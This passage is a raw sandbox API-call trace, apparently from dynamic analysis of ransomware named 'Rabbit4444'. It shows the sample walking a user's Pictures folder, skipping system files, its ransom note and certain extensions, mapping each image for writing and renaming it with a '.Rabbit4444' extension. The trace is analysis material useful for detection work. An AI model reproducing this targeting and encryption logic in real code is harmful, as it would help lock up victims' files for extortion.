ftCreationTime.dwLowDateTime=0x399e69b0, ftCreationTime.dwHighDateTime=0x1d4c793, ftLastAccessTime.dwLowDateTime=0xa1930e10, ftLastAccessTime.dwHighDateTime=0x1d4c5a2, ftLastWriteTime.dwLowDateTime=0xa1930e10, ftLastWriteTime.dwHighDateTime=0x1d4c5a2, nFileSizeHigh=0x0, nFileSizeLow=0x17445, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5e7Wc.bmp", cAlternateFileName="")) returned 1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2=".") returned 1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="..") returned 1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="windows") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="bootmgr") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="pagefile.sys") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="boot") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="ids.txt") returned -1 [0048.615] lstrcmpiW (lpString1="5e7Wc.bmp", lpString2="NTUSER.DAT") returned -1 [0048.616] lstrcpyW (in: lpString1=0x130eb6a, lpString2="5e7Wc.bmp" | out: lpString1="5e7Wc.bmp") returned="5e7Wc.bmp" [0048.616] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5e7Wc.bmp", dwFileAttributes=0x0) returned 1 [0048.616] lstrlenW (lpString="5e7Wc.bmp") returned 9 [0048.616] lstrlenW (lpString="Rabbit4444") returned 10 [0048.616] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0048.616] lstrlenW (lpString=".dll") returned 4 [0048.616] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.616] lstrlenW (lpString=".lnk") returned 4 [0048.616] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.616] lstrlenW (lpString=".ini") returned 4 [0048.616] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.616] lstrlenW (lpString=".sys") returned 4 [0048.616] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5e7Wc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5e7wc.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.616] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.616] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13992696033) returned 1 [0048.616] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=95301) returned 1 [0048.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0048.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0048.616] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17750, lpName=0x0) returned 0x298 [0048.616] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17750) returned 0x70000 [0048.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.619] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13992995616) returned 1 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0048.619] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0048.619] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.620] CloseHandle (hObject=0x298) returned 1 [0048.620] CloseHandle (hObject=0x278) returned 1 [0048.633] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\5e7Wc.bmp.Rabbit4444") returned 45 [0048.633] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\5e7Wc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5e7wc.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\5e7Wc.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\5e7wc.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.634] InterlockedExchangeAdd (in: Addend=0xff618, Value=95312 | out: Addend=0xff618) returned 17362720 [0048.634] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3376 [0048.634] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2185ca90, ftCreationTime.dwHighDateTime=0x1d4c77e, ftLastAccessTime.dwLowDateTime=0x6e084b00, ftLastAccessTime.dwHighDateTime=0x1d4c72d, ftLastWriteTime.dwLowDateTime=0x6e084b00, ftLastWriteTime.dwHighDateTime=0x1d4c72d, nFileSizeHigh=0x0, nFileSizeLow=0xb46d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5NeoW1fKEkQU.jpg", cAlternateFileName="5NEOW1~1.JPG")) returned 1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="Rabbit4444.exe") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2=".") returned 1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="..") returned 1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="windows") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="bootmgr") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="pagefile.sys") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="boot") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="ids.txt") returned -1 [0048.634] lstrcmpiW (lpString1="5NeoW1fKEkQU.jpg", lpString2="NTUSER.DAT") returned -1 [0048.634] lstrcpyW (in: lpString1=0x130eb6a, lpString2="5NeoW1fKEkQU.jpg" | out: lpString1="5NeoW1fKEkQU.jpg") returned="5NeoW1fKEkQU.jpg" [0048.634] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5NeoW1fKEkQU.jpg", dwFileAttributes=0x0) returned 1 [0048.635] lstrlenW (lpString="5NeoW1fKEkQU.jpg") returned 16 [0048.635] lstrlenW (lpString="Rabbit4444") returned 10 [0048.635] lstrcmpiW (lpString1="fKEkQU.jpg", lpString2="Rabbit4444") returned -1 [0048.635] lstrlenW (lpString=".dll") returned 4 [0048.635] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.635] lstrlenW (lpString=".lnk") returned 4 [0048.635] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0048.635] lstrlenW (lpString=".ini") returned 4 [0048.635] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0048.635] lstrlenW (lpString=".sys") returned 4 [0048.635] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0048.635] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5NeoW1fKEkQU.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\5neow1fkekqu.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.635] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.635] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13994573078) returned 1 [0048.635] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46189) returned 1 [0048.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.635] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0048.635] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb770, lpName=0x0) returned 0x298 [0048.635] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb770) returned 0x70000 [0048.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0048.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0048.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13994768575) returned 1 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0048.637] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.638] CloseHandle (hObject=0x298) returned 1 [0048.638] CloseHandle (hObject=0x278) returned 1 [0048.640] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\5NeoW1fKEkQU.jpg.Rabbit4444") returned 52 [0048.640] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\5NeoW1fKEkQU.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\5neow1fkekqu.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\5NeoW1fKEkQU.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\5neow1fkekqu.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0048.640] InterlockedExchangeAdd (in: Addend=0xff618, Value=46192 | out: Addend=0xff618) returned 17458032 [0048.640] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3378 [0048.640] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410dbe80, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0x4bcef960, ftLastAccessTime.dwHighDateTime=0x1d4c9eb, ftLastWriteTime.dwLowDateTime=0x4bcef960, ftLastWriteTime.dwHighDateTime=0x1d4c9eb, nFileSizeHigh=0x0, nFileSizeLow=0x580e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7snkBq.bmp", cAlternateFileName="")) returned 1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2=".") returned 1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="..") returned 1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="windows") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="bootmgr") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="pagefile.sys") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="boot") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="ids.txt") returned -1 [0048.640] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="NTUSER.DAT") returned -1 [0048.641] lstrcpyW (in: lpString1=0x130eb6a, lpString2="7snkBq.bmp" | out: lpString1="7snkBq.bmp") returned="7snkBq.bmp" [0048.641] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7snkBq.bmp", dwFileAttributes=0x0) returned 1 [0048.641] lstrlenW (lpString="7snkBq.bmp") returned 10 [0048.641] lstrlenW (lpString="Rabbit4444") returned 10 [0048.641] lstrcmpiW (lpString1="7snkBq.bmp", lpString2="Rabbit4444") returned -1 [0048.641] lstrlenW (lpString=".dll") returned 4 [0048.641] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.641] lstrlenW (lpString=".lnk") returned 4 [0048.641] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.641] lstrlenW (lpString=".ini") returned 4 [0048.641] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.641] lstrlenW (lpString=".sys") returned 4 [0048.641] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7snkBq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7snkbq.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.641] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.641] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13995191732) returned 1 [0048.641] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22542) returned 1 [0048.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.641] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0048.641] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b10, lpName=0x0) returned 0x298 [0048.641] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b10) returned 0x70000 [0048.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.642] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0048.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0048.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.643] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13995341934) returned 1 [0048.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0048.643] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.643] CloseHandle (hObject=0x298) returned 1 [0048.643] CloseHandle (hObject=0x278) returned 1 [0048.645] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\7snkBq.bmp.Rabbit4444") returned 46 [0048.645] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\7snkBq.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7snkbq.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\7snkBq.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\7snkbq.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.645] InterlockedExchangeAdd (in: Addend=0xff618, Value=22544 | out: Addend=0xff618) returned 17504224 [0048.645] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3379 [0048.645] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735e6680, ftCreationTime.dwHighDateTime=0x1d4d447, ftLastAccessTime.dwLowDateTime=0xacbcc320, ftLastAccessTime.dwHighDateTime=0x1d4ccf6, ftLastWriteTime.dwLowDateTime=0xacbcc320, ftLastWriteTime.dwHighDateTime=0x1d4ccf6, nFileSizeHigh=0x0, nFileSizeLow=0x10dda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7V2nOIAHdw9cQ.bmp", cAlternateFileName="7V2NOI~1.BMP")) returned 1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="Rabbit4444.exe") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2=".") returned 1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="..") returned 1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="windows") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="bootmgr") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="pagefile.sys") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="boot") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="ids.txt") returned -1 [0048.645] lstrcmpiW (lpString1="7V2nOIAHdw9cQ.bmp", lpString2="NTUSER.DAT") returned -1 [0048.645] lstrcpyW (in: lpString1=0x130eb6a, lpString2="7V2nOIAHdw9cQ.bmp" | out: lpString1="7V2nOIAHdw9cQ.bmp") returned="7V2nOIAHdw9cQ.bmp" [0048.646] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7V2nOIAHdw9cQ.bmp", dwFileAttributes=0x0) returned 1 [0048.646] lstrlenW (lpString="7V2nOIAHdw9cQ.bmp") returned 17 [0048.646] lstrlenW (lpString="Rabbit4444") returned 10 [0048.646] lstrcmpiW (lpString1="Hdw9cQ.bmp", lpString2="Rabbit4444") returned -1 [0048.646] lstrlenW (lpString=".dll") returned 4 [0048.646] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0048.646] lstrlenW (lpString=".lnk") returned 4 [0048.646] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0048.646] lstrlenW (lpString=".ini") returned 4 [0048.646] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0048.646] lstrlenW (lpString=".sys") returned 4 [0048.646] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0048.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7V2nOIAHdw9cQ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7v2noiahdw9cq.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.646] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.646] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13995689762) returned 1 [0048.646] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69082) returned 1 [0048.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0048.646] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0048.646] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x110e0, lpName=0x0) returned 0x298 [0048.646] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110e0) returned 0x70000 [0048.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.649] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13995972128) returned 1 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0048.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0048.649] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.650] CloseHandle (hObject=0x298) returned 1 [0048.650] CloseHandle (hObject=0x278) returned 1 [0048.652] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\7V2nOIAHdw9cQ.bmp.Rabbit4444") returned 53 [0048.652] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\7V2nOIAHdw9cQ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7v2noiahdw9cq.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\7V2nOIAHdw9cQ.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\pictures\\7v2noiahdw9cq.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0048.653] InterlockedExchangeAdd (in: Addend=0xff618, Value=69088 | out: Addend=0xff618) returned 17526768 [0048.653] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3380 [0048.653] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85e2790, ftCreationTime.dwHighDateTime=0x1d4cc80, ftLastAccessTime.dwLowDateTime=0x69ed23b0, ftLastAccessTime.dwHighDateTime=0x1d4c64c, ftLastWriteTime.dwLowDateTime=0x69ed23b0, ftLastWriteTime.dwHighDateTime=0x1d4c64c, nFileSizeHigh=0x0, nFileSizeLow=0x136cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ZNXracFupquDdAVyh.png", cAlternateFileName="7ZNXRA~1.PNG")) returned 1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="Rabbit4444.exe") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2=".") returned 1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="..") returned 1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="windows") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="bootmgr") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="pagefile.sys") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="boot") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="ids.txt") returned -1 [0048.653] lstrcmpiW (lpString1="7ZNXracFupquDdAVyh.png", lpString2="NTUSER.DAT") returned -1 [0048.653] lstrcpyW (in: lpString1=0x130eb6a, lpString2="7ZNXracFupquDdAVyh.png" | out: lpString1="7ZNXracFupquDdAVyh.png") returned="7ZNXracFupquDdAVyh.png" [0048.653] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7ZNXracFupquDdAVyh.png", dwFileAttributes=0x0) returned 1 [0048.653] lstrlenW (lpString="7ZNXracFupquDdAVyh.png") returned 22 [0048.653] lstrlenW (lpString="Rabbit4444") returned 10 [0048.653] lstrcmpiW (lpString1="DdAVyh.png", lpString2="Rabbit4444") returned -1 [0048.653] lstrlenW (lpString=".dll") returned 4 [0048.653] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0048.653] lstrlenW (lpString=".lnk") returned 4 [0048.654] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0048.654] lstrlenW (lpString=".ini") returned 4 [0048.654] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0048.654] lstrlenW (lpString=".sys") returned 4 [0048.654] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0048.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7ZNXracFupquDdAVyh.png" (normalized: "c:\\users\\fd1hvy\\pictures\\7znxracfupquddavyh.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.654] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.654] 